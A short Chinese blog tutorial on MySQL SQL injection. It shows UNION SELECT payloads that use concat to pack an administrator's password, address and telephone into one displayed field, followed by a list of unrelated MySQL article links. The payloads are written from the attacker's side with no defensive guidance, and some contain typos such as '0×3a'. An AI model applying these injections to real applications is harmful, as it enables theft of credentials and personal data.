Mysql數(shù)據(jù)庫使用concat函數(shù)執(zhí)行SQL注入查詢

更新時(shí)間：2015年04月09日 10:04:08 投稿：junjie

這篇文章主要介紹了Mysql數(shù)據(jù)庫使用concat函數(shù)執(zhí)行SQL注入查詢,concat函數(shù)在SQL注入查詢中會(huì)有意想不到的作用,本文就起講解它的使用,需要的朋友可以參考下

SQL注入語句有時(shí)候會(huì)使用替換查詢技術(shù)，就是讓原有的查詢語句查不到結(jié)果出錯(cuò)，而讓自己構(gòu)造的查詢語句執(zhí)行，并把執(zhí)行結(jié)果代替原有查詢語句查詢結(jié)果顯示出來。

例如：原本查詢語句是

復(fù)制代碼代碼如下:

select username,email,content from test_table where user_id=uid;

其中uid,是用戶輸入的。正常顯示結(jié)果會(huì)出現(xiàn)用戶名，用戶郵箱，用戶留言內(nèi)容。但是如果uid過濾不嚴(yán)，我們可以構(gòu)造如下SQL語句來獲得任意數(shù)據(jù)表信息。

復(fù)制代碼代碼如下:

uid=-1 union select username ,password,content from test_talbe where user_id=管理員id;

實(shí)際執(zhí)行就是

復(fù)制代碼代碼如下:

select username,email,content from test_table where user_id=－1 union select username ,password,content from test_talbe where user_id=管理員id;

其中顯示正常用戶emai的地方，變成了顯示管理員的密碼了。

但是，往往事情并不是這么簡(jiǎn)單，首先要找到漏洞，其次構(gòu)造這種語句時(shí)候要考慮各個(gè)字段的類型，讓int或samllint類型的字段顯示varchar顯然不合適。最后就是本文要說的。

如果出現(xiàn)問題的SQL語句只有一個(gè)或兩個(gè)字段怎么辦，我們想知道很多東西，一兩個(gè)字段太少了，遠(yuǎn)遠(yuǎn)不能滿足我們的需要。那么我們可以使用concat函數(shù)。

concat函數(shù)本來是這樣用的SELECT CONCAT('My', 'S', 'QL');執(zhí)行結(jié)果是'MySQL'。也就是連接作用的。我們利用它來為我們服務(wù)，

復(fù)制代碼代碼如下:

uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理員id;

這個(gè)語句實(shí)際查詢了六個(gè)字段，但是顯示的時(shí)候，把password,sex,address,telephone等字段合在一起，顯示在原本應(yīng)該顯示email的地方。

更好的方法：中間用分隔符分開：

復(fù)制代碼代碼如下:

uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理員id;

其中0×3a是“:”的十六進(jìn) 制形式。

您可能感興趣的文章:

相關(guān)文章

SQL語句中LEFT JOIN的ON和WHERE有什么區(qū)別
這篇文章主要介紹了SQL語句中LEFT JOIN的ON和WHERE之間的區(qū)別，文中通過示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面隨著小編來一起學(xué)習(xí)吧
2022-12-12
MySql死鎖怎么排查的方法實(shí)現(xiàn)
本文主要介紹了MySql死鎖怎么排查的方法實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
2025-02-02
windows下MySQL5.6版本安裝及配置過程附有截圖和詳細(xì)說明
這篇文章主要介紹了windows下MySQL5.6版本安裝及配置過程附有截圖和詳細(xì)說明，需要的朋友可以參考下
2013-06-06
新手入門Mysql--概念
MySQL 是一種關(guān)系型數(shù)據(jù)庫，在Java企業(yè)級(jí)開發(fā)中非常常用，因?yàn)?MySQL 是開源免費(fèi)的，并且方便擴(kuò)展MySQL是開放源代碼的，因此任何人都可以在 GPL的許可下下載并根據(jù)個(gè)性化的需要對(duì)其進(jìn)行修改
2021-06-06
淺談MySQL之select優(yōu)化方案
我們是否看到過在公司中許多查詢語句都是select * xxxx，本文就主要介紹了MySQL之select優(yōu)化方案，具有一定的參考價(jià)值，感興趣的可以了解一下
2021-08-08
MySQL子查詢用法實(shí)例分析
這篇文章主要介紹了MySQL子查詢用法,結(jié)合實(shí)例形式對(duì)比分析了MySQL子查詢的設(shè)置技巧,需要的朋友可以參考下
2016-04-04
MySQL生成千萬測(cè)試數(shù)據(jù)以及遇到的問題
前兩天發(fā)現(xiàn)同事要做一個(gè)對(duì)大表進(jìn)行范圍查詢的功能,所以需要生成千萬數(shù)據(jù)進(jìn)行性能測(cè)試,下面這篇文章主要給大家介紹了關(guān)于MySQL生成千萬測(cè)試數(shù)據(jù)以及遇到的問題的相關(guān)資料,文中通過實(shí)例代碼介紹的非常詳細(xì),需要的朋友可以參考下
2022-08-08
mysql 重要日志文件匯總
這篇文章主要介紹了mysql 重要日志文件的匯總，幫助大家更好的理解和使用MySQL數(shù)據(jù)庫，感興趣的朋友可以了解下
2020-11-11
mysql 性能的檢查和調(diào)優(yōu)方法
我一直是使用mysql這個(gè)數(shù)據(jù)庫軟件，它工作比較穩(wěn)定，效率也很高。
2009-05-05
解決mysql數(shù)據(jù)庫導(dǎo)入sql文件不成功的問題
這篇文章主要介紹了解決mysql數(shù)據(jù)庫導(dǎo)入sql文件不成功的問題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
2023-11-11